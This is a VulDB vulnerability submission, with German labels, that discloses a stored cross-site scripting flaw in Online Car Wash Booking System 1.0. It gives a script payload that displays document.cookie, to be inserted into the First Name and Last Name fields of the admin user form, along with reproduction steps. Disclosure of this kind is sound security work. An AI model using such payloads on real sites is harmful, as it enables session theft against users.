| Titel | SourceCodester Online Car Wash Booking System 1.0 Cross Site Scripting |
|---|
| Beschreibung | # Exploit Title: Online Car Wash Booking System - Stored XSS
# Exploit Author: darkrai069
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
`
Description:-
A Stored Cross-Site Scripting (XSS) vulnerability in Online Car Wash Booking System allows to inject Arbitrary JavaScript in Edit in "First Name" and "Last Name".
`
Payload used:-
<script>confirm (document.cookie)</script>
`
Parameter":-
First Name: <script>confirm (document.cookie)</script>
Last Name: <script>confirm (document.cookie)</script>
`
Steps to reproduce:-
1. Login into your admin account
2. Now go to http://localhost:8080/ocwbs/admin/?page=user/list and add an new user
3. In that "First Name" and " Last Name " parameter put the payload.
<script>confirm (document.cookie)</script>
4. As you can see our payload has been executed. |
|---|
| Benutzer | Anonymous User |
|---|
| Einreichung | 25.05.2024 15:19 (vor 2 Jahren) |
|---|
| Moderieren | 25.05.2024 20:27 (5 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 266303 [oretnom23 Online Car Wash Booking System 1.0 /admin/?page=user/list First Name/Last Name Cross Site Scripting] |
|---|
| Punkte | 17 |
|---|